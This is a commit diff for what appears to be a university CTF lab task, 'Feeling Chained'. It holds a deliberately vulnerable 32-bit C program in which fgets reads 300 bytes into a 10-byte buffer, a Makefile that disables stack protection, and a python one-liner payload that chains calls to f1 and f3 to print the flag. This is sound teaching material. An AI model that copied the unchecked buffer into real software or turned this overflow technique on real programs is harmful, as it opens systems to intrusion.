i consider feeling-chained task to remain on 32bit version due to didactical reasons

Author: Nastyst16

labs/lab-12/tasks/feeling-chained/README.md

@@ -1,13 +1,29 @@
----
-nav_order: 7
-parent: Lab 12 - CTF
-has_children: true
----
-
-# Task: Feeling Chained
-
-Follow the sequence of operations in the functions of the binary at `feeling-chained/support/buff-ovf3`.
-Identify the necessary ones and... you already know how to call them.
-
-If you cannot find your way through this exercise, look for variables that you need to overwrite with specific values in order to finish the exploit, and think of their positioning on the stack.
-The previously mentioned [online example](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85) is still highly relevant.
+---
+nav_order: 7
+parent: Lab 12 - CTF
+has_children: true
+---
+
+# Task: Feeling Chained
+
+Follow the sequence of operations in the functions of the binary at `feeling-chained/support/buff-ovf3`.
+Identify the necessary ones and... you already know how to call them.
+
+If you cannot find your way through this exercise, look for variables that you need to overwrite with specific values in order to finish the exploit, and think of their positioning on the stack.
+The previously mentioned [online example](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85) is still highly relevant.
+
+## Checker
+
+To test the implementation, enter the `tests/` directory and run:
+
+```console
+make check
+```
+
+In case of a correct solution, you will get an output such as:
+
+```text
+test_payload                     ........................ passed ... 100
+
+Total:                                                           100/100
+```

labs/lab-12/tasks/feeling-chained/solution/Makefile

@@ -1,23 +1,23 @@
-CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
-SRC_DIR = .
-TARGET = buff-ovf3
-OBJ = buff-ovf3.o
-
-all: $(TARGET)
-
-obfuscator: $(SRC_DIR)/obfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
-
-deobfuscator: $(SRC_DIR)/deobfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
-
-$(TARGET): $(OBJ)
-	$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
-
-$(OBJ): $(SRC_DIR)/buff-ovf3.c
-	$(CC) $(CFLAGS) -c $(SRC_DIR)/buff-ovf3.c
-
-clean:
-	rm -rf $(OBJ) $(TARGET) obfuscator deobfuscator
+CC = gcc
+CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m32
+SRC_DIR = .
+TARGET = buff-ovf3
+OBJ = buff-ovf3.o
+
+all: $(TARGET)
+
+obfuscator: $(SRC_DIR)/obfuscator.c
+	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+
+deobfuscator: $(SRC_DIR)/deobfuscator.c
+	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+
+$(TARGET): $(OBJ)
+	$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
+
+$(OBJ): $(SRC_DIR)/buff-ovf3.c
+	$(CC) $(CFLAGS) -c $(SRC_DIR)/buff-ovf3.c
+
+clean:
+	rm -rf $(OBJ) $(TARGET) obfuscator deobfuscator

labs/lab-12/tasks/feeling-chained/solution/README.md

@@ -1,22 +1,14 @@
----
-nav_order: 1
-parent: 'Task: Feeling Chained'
----
-
-# Solution
-
-> 💡 **Note**: The buffer overflow shown here works on 32-bit binaries where function arguments are passed on the stack, allowing us to directly place values after the return addresses.
-
-By using the buffer overflow in `gateway()`, functions `f1(56, 13)` and `f3(13)` need to be called in this order, with those exact parameters.
-`f3` is the one that actually calls `get_flag()`.
-Calling `get_flag()` directly shouldn't work (a global variable is checked to make sure all steps were made).
-
-```sh
-python3 -c 'import sys; sys.stdout.buffer.write(
-    b"A"*22 +
-    b"\x48\x93\x04\x08" +  # f1 address
-    b"\xf2\x92\x04\x08" +  # f3 address
-    b"\x38\x00\x00\x00" +  # 56
-    b"\x0d\x00\x00\x00"    # 13
-)' | ./buff-ovf3
-```
+---
+nav_order: 1
+parent: 'Task: Feeling Chained'
+---
+
+# Solution
+
+By using the buffer overflow in `gateway()`, functions `f1(56, 13)` and `f3(13)` need to be called in this order, with those exact parameters.
+`f3` is the one that actually calls `get_flag()`.
+Calling `get_flag()` directly shouldn't work (a global variable is checked to make sure all steps were made).
+
+```sh
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x56\x93\x04\x08" + b"\x00\x93\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3
+```

labs/lab-12/tasks/feeling-chained/solution/buff-ovf3.c

@@ -1,85 +1,85 @@
-// SPDX-License-Identifier: BSD-3-Clause
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#define MAXC 1000
-
-static int my_global_var;
-static int my_other_global_var;
-
-void get_flag(void)
-{
-	const int start_offset = 5;
-	unsigned int seed = 42;
-
-	if (my_other_global_var != 0x7890) {
-		printf("You're cheating, mate. Try harder\n");
-		return;
-	}
-	/* Here goes the obfuscated flag outputted by obfuscate.c */
-	char *flag = "\x66\x3b\x70\x76\x76\x16\x2f\x4b\x38\x60\x4b\x31\x52\x5a\x4a\x37"
-			 "\x20\x6c\x24\x21\x49\x5c\x08\x45\x41\x58\x39\x40\x35\x6f\x25\x43"
-			 "\x31\x70\x6d\x71\x56\x1e\x0a\x11\x32\x61\x07\x64\x25\x0b\x4c\x31"
-			 "\x0b\x43\x07\x0f\x7c\x4c\x0a\x6b\x37\x1d\x6c\x09\x70\x6a\x54\x5b"
-			 "\x2d\x5d\x1a\x46\x31\x70\x24\x2b\x51\x2c\x6d\x06\x16\x47\x70\x4b"
-			 "\x71";
-
-	int i = 0;
-	int iflag = 0;
-	int garbage;
-	char *res = (char *)malloc(MAXC);
-
-	while (flag[iflag]) {
-		garbage = rand_r(&seed) % 5;
-		while (garbage--) {
-			rand_r(&seed);
-			++iflag;
-		}
-		res[i++] = (flag[iflag] - 1) ^ ((start_offset + iflag) % 128) ^ (rand_r(&seed) % 128);
-		++iflag;
-	}
-	res[i] = 0;
-
-	puts(res);
-}
-
-void f3(int x)
-{
-	if (x == 13 && my_global_var == 0x1234) {
-		my_other_global_var = 0x7890;
-		get_flag();
-	} else {
-		printf("You missed something\n");
-	}
-}
-
-void f2(void)
-{
-	printf("I dont do nothing\n");
-}
-
-void f1(int a, int b)
-{
-	if (a + b == 69) {
-		printf("You're doing great\n");
-		my_global_var = 0x1234;
-	} else {
-		printf("You got the params wrong\n");
-	}
-}
-
-void gateway(void)
-{
-	char buff1[10];
-
-	fgets(buff1, 300, stdin);
-}
-
-int main(void)
-{
-	gateway();
-
-	return 0;
-}
+// SPDX-License-Identifier: BSD-3-Clause
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#define MAXC 1000
+
+static int my_global_var;
+static int my_other_global_var;
+
+void get_flag(void)
+{
+	const int start_offset = 5;
+	unsigned int seed = 42;
+
+	if (my_other_global_var != 0x7890) {
+		printf("You're cheating, mate. Try harder\n");
+		return;
+	}
+	/* Here goes the obfuscated flag outputted by obfuscate.c */
+	char *flag = "\x66\x3b\x70\x76\x76\x16\x2f\x4b\x38\x60\x4b\x31\x52\x5a\x4a\x37"
+			 "\x20\x6c\x24\x21\x49\x5c\x08\x45\x41\x58\x39\x40\x35\x6f\x25\x43"
+			 "\x31\x70\x6d\x71\x56\x1e\x0a\x11\x32\x61\x07\x64\x25\x0b\x4c\x31"
+			 "\x0b\x43\x07\x0f\x7c\x4c\x0a\x6b\x37\x1d\x6c\x09\x70\x6a\x54\x5b"
+			 "\x2d\x5d\x1a\x46\x31\x70\x24\x2b\x51\x2c\x6d\x06\x16\x47\x70\x4b"
+			 "\x71";
+
+	int i = 0;
+	int iflag = 0;
+	int garbage;
+	char *res = (char *)malloc(MAXC);
+
+	while (flag[iflag]) {
+		garbage = rand_r(&seed) % 5;
+		while (garbage--) {
+			rand_r(&seed);
+			++iflag;
+		}
+		res[i++] = (flag[iflag] - 1) ^ ((start_offset + iflag) % 128) ^ (rand_r(&seed) % 128);
+		++iflag;
+	}
+	res[i] = 0;
+
+	puts(res);
+}
+
+void f3(int x)
+{
+	if (x == 13 && my_global_var == 0x1234) {
+		my_other_global_var = 0x7890;
+		get_flag();
+	} else {
+		printf("You missed something\n");
+	}
+}
+
+void f2(void)
+{
+	printf("I dont do nothing\n");
+}
+
+void f1(int a, int b)
+{
+	if (a + b == 69) {
+		printf("You're doing great\n");
+		my_global_var = 0x1234;
+	} else {
+		printf("You got the params wrong\n");
+	}
+}
+
+void gateway(void)
+{
+	char buff1[10];
+
+	fgets(buff1, 300, stdin);
+}
+
+int main(void)
+{
+	gateway();
+
+	return 0;
+}